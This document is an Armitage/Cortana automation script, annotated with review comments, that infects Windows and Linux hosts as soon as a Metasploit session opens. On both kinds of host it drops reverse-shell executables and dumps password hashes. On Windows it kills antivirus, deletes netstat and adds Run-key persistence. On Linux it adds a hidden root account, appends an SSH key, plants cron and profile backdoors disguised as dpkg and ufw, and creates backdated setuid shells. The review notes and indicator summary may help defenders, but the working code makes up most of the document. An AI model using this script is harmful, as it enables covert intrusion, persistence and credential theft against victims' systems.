  1. # Script to install/hide a few shells/accounts
  2. # To Do
  3. # Check for root
  4. # Encode payloads
  5. # Filter bad addresses on load
  6. # Add dns server
  7. # add infolinkd.dll
  8. # Update hosts file with fake entries to break patching (evil grade?)
  9. # Author: __int128
# Script-wide state. This is a Cortana (Sleep) script for Armitage, not Perl:
# it runs inside the Armitage client and reacts to Metasploit session events.
global('%infected');                 # target address -> "1" once the session_open handler has run against it
$addresses = @();                    # NOTE(review): declared with '$', but every later use reads @addresses (filled in 'on ready') — confirm whether Sleep treats these as one variable
$win_user = 'lls_USER';              # account name passed to getgui/gettelnet and recorded with 'creds --add'
$win_pass = '@pplesauc3';            # SECURITY: static, hard-coded credential; identical on every target this script touches
$local_ip = lhost();                 # not referenced anywhere in the visible script
@alphabet = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");   # letter pool for the random 5-char artifact names
  16.  
# Runs once Armitage is connected. Collects the attacker-side IPv4 addresses
# so a payload can be generated for each of them later on.
on ready {
    # Registered here so it only fires for the ifconfig run below; presumably
    # $3 is the captured console output — TODO confirm against the Cortana docs.
    on console_ifconfig {
        @addresses = split("\n", $3);
    }
    # Linux-style ifconfig parsing ("inet addr:x.x.x.x"); on hosts whose ifconfig
    # prints "inet x.x.x.x" instead, @addresses would stay empty. Lines that are
    # not plain dotted quads are filtered again in session_open.
    cmd_async('ifconfig | grep "inet addr" | cut -d ":" -f 2 | cut -d " " -f 1');
}
  23.  
# Fires for every new Metasploit session. The first session from a given host
# runs the platform-specific branch below; later sessions from the same host
# fall through to the trailing 'else' and do nothing.
#
# Incident-response summary of the host artifacts this handler creates (taken
# from the commands below; useful as indicators when triaging a compromised box):
#   Windows: netstat.exe deleted; 'killav' and 'metsvc' run; a random 5-letter
#            .exe written to C:\Windows\System32 and registered as Run value
#            "update"; 'persistence' installed once per attacker address; RDP
#            and telnet enabled via getgui/gettelnet; hashdump run.
#   Linux:   /bin/netstat removed; attacker public key appended to
#            /root/.ssh/authorized_keys; uid-0 user "administrator" appended to
#            /etc/passwd and /etc/shadow; /etc/cron.5min/dpkg and /usr/bin/ufw
#            replaced with a reverse-shell ELF and made immutable (chattr +i);
#            /etc/profile and /etc/skel/.profile start it; setuid copies of zsh
#            and tcsh at /.kernel and /tmp/X11.auth with a backdated mtime.
on session_open {
    $rhost = session_host($1);
    # '!=' is a numeric comparison; an unset key compares unequal to "1" as well,
    # so this reads as "host not yet infected".
    if (%infected[session_host($1)] != "1") {
        if (host_os(session_host($1)) eq "Microsoft Windows") {
            if(-isshell $1) {
                # Plain command shell: ask Metasploit to upgrade it; the upgraded
                # meterpreter session will trigger this handler again.
                cmd_async("sessions -u $1");
            }
            if(-iswinmeterpreter $1) {
                say("Infecting " . session_host($1));
                %infected[session_host($1)] = "1";
                m_cmd($1, "getsystem");   # escalation attempt; the result is never checked
                m_cmd($1, "run killav");
                m_cmd($1, "run metsvc");  # bind service; re-attached on port 31337 below and from the host popup

                # delete netstat
                m_cmd($1, "del c:\\Windows\\System32\\netstat.exe");

                # Generate Payload(s)
                # One listener port is shared by all attacker addresses; the raw
                # shellcode for each address is concatenated into a single file.
                $r_lport_a = random_port();
                $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
                $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
                createNewFile("/tmp/$r_name");
                foreach $address (@addresses) {
                    # Validate its an address
                    if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
                        # Filter out unwanted addresses # should really be done above
                        # Hard-coded skip list: loopback plus two lab gateway addresses.
                        if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
                            $raw = generate("windows/shell_reverse_tcp", $address, $r_lport_a, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
                            # remove last two bytes of windows payload
                            # Credit to HDMoore for the idea
                            # Presumably so execution falls through into the next
                            # appended payload instead of terminating — TODO confirm.
                            $raw = substr($raw, 0, strlen($raw)-2);
                            $handle = openf(">>/tmp/$r_name");
                            writeb($handle, $raw);
                            closef($handle);
                        }
                    }
                }
                #deleteFile("/tmp/update.exe");
                # Wraps the concatenated shellcode into a PE on the attacker box.
                exec("msfencode -i /tmp/$r_name -p windows -a x86 -e generic/none -t exe -o /tmp/$r_backdoor");

                #sleep so that the payload can be generated
                # 30–90 s fixed delay inside the event handler; there is no check
                # that /tmp/$r_backdoor actually exists before the upload below.
                sleep((30 + rand(60)) * 1000);
                m_cd($1, 'c:\Windows\System32');
                m_upload($1, "/tmp/$r_backdoor");
                # Autorun via HKLM Run value "update" pointing at the dropped exe.
                m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\$r_backdoor\"");
                # Second persistence mechanism: one 'persistence' install and one
                # meterpreter handler per attacker address (no dotted-quad check here).
                foreach $address (@addresses) {
                    if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
                        $r_lport_b = random_port();
                        m_cmd($1, "run persistence -X -i 60 -p $r_lport_b -r $address");
                        handler("windows/meterpreter/reverse_tcp", $r_lport_b, %(LHOST => $address, ExitOnSession => "false"));
                    }
                }
                # NOTE(review): $backdoor_user / $backdoor_pass are not assigned
                # anywhere in the visible script; the only credentials defined are
                # $win_user / $win_pass, which are what gets recorded below.
                m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
                m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
                $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";
                cmd_async($rdp);
                $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";
                cmd_async($tel);

                # Catch-all listener for the dropped exe (any local address) and a
                # bind handler for the metsvc service installed above.
                handler("windows/shell_reverse_tcp", $r_lport_a, %(LHOST => "0.0.0.0", ExitOnSession => "false", AutoRunScript => "spawn_meterpreter"));
                handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
                m_cmd($1, "run hashdump");
                say("Done Infecting " . session_host($1));
            }
        }
        else if (host_os(session_host($1)) eq "Linux") {
            if (-isshell $1) {
                say("Infecting " . session_host($1));
                %infected[session_host($1)] = "1";

                # Removing netstat
                s_cmd($1, "rm -rf /bin/netstat");

                # SSH key persistence for root; the key pair lives on the attacker
                # box at the hard-coded Armitage data path used again further down.
                s_cmd($1, "mkdir /root/.ssh");
                # on load prompt for keys or generate?
                $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
                $pub_key = readln($handle);   # only the first line of the key file is read
                s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
                closef($handle);
                # Extra uid-0 account appended directly to the account databases.
                # The shadow hash is a fixed SHA-512 crypt with a fixed salt, so
                # it is identical on every target (password noted in the comment).
                s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
                s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
                $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
                cmd_async($ssh);

                # Generate Payload
                # Same scheme as the Windows branch, minus the two-byte trim.
                $r_lport = random_port();
                $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
                $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
                createNewFile("/tmp/$r_name");
                foreach $address (@addresses) {
                    # Validate its an address
                    if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
                        # Filter out unwanted addresses # should really be done above
                        if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
                            $raw = generate("linux/x86/shell_reverse_tcp", $address, $r_lport, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
                            $handle = openf(">>/tmp/$r_name");
                            writeb($handle, $raw);
                            closef($handle);
                        }
                    }
                }
                #deleteFile("/tmp/linux_backdoor");
                exec("msfencode -i /tmp/$r_name -p linux -a x86 -e generic/none -t elf -o /tmp/$r_backdoor");
                # Fixed 30–90 s wait; the ELF's existence is not verified.
                sleep ((30 + rand(60)) * 1000 );
                #deleteFile("/tmp/$r_name");

                # set cron job
                # Persistence 1: a new run-parts directory wired into /etc/crontab
                # and root's crontab, holding the ELF disguised as "dpkg".
                s_cmd($1, "mkdir /etc/cron.5min");
                s_cmd($1, "echo '*/15 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
                s_cmd($1, "echo '*/15 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
                s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
                shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
                s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")   # NOTE(review): no ';' terminates this statement
                s_cmd($1, "chattr +i /etc/cron.5min/dpkg");

                # set profile
                # Persistence 2: the real ufw binary is overwritten with the ELF and
                # backgrounded from every login shell's profile.
                shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
                s_cmd($1, "chmod 775 /usr/bin/ufw");
                s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
                s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
                s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");

                # Create Backup Shell
                # Setuid/setgid/sticky copies of shells with a backdated timestamp.
                s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
                s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");

                # Launch our aux shells
                # Listener for the ELF, then immediate SSH logins using the key and
                # the added account so their sessions show up in Armitage.
                handler("linux/x86/shell_reverse_tcp", $r_lport, %(LHOST => "0.0.0.0", ExitOnSession => "false"));
                auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
                login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));

                # Get hashes
                launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
                db_sync();
                say("Done Infecting " . session_host($1));
            }
        }
        else {
            # Any other OS string is left alone.
            say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));
        }
    }
    else {
        # Host already processed. The shell upgrade is intentionally disabled
        # here; the original author's reason is kept verbatim below.
        if (host_os(session_host($1)) eq "Microsoft Windows") {
            if(-isshell $1) {
                # can not upgrade due to sessions binding to 0.0.0.0 and port already listening due to persistant listeners
                #cmd_async("sessions -u $1");
            }
        }
    }
}
  174.  
# Right-click menu entry on a host in the Armitage graph. Only offered for
# hosts marked in %infected, and re-attaches using the access planted by
# session_open (metsvc bind handler, or SSH with the planted key/account).
popup host_bottom {
    $rhost = $1;   # captured when the menu is built, reused inside the item closure
    # Numeric '==' here versus numeric '!=' in session_open; consistent with each other.
    if (%infected[$1] == "1") {
        item "Re-establish connection" {
            if (host_os($1) eq "Microsoft Windows") {
                # Same port the metsvc handler in session_open was started on.
                handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
            }
            if (host_os($1) eq "Linux") {
                # Key path and the administrator/abc123 account mirror the Linux branch of session_open.
                auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
                login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
            }
        }
    }
}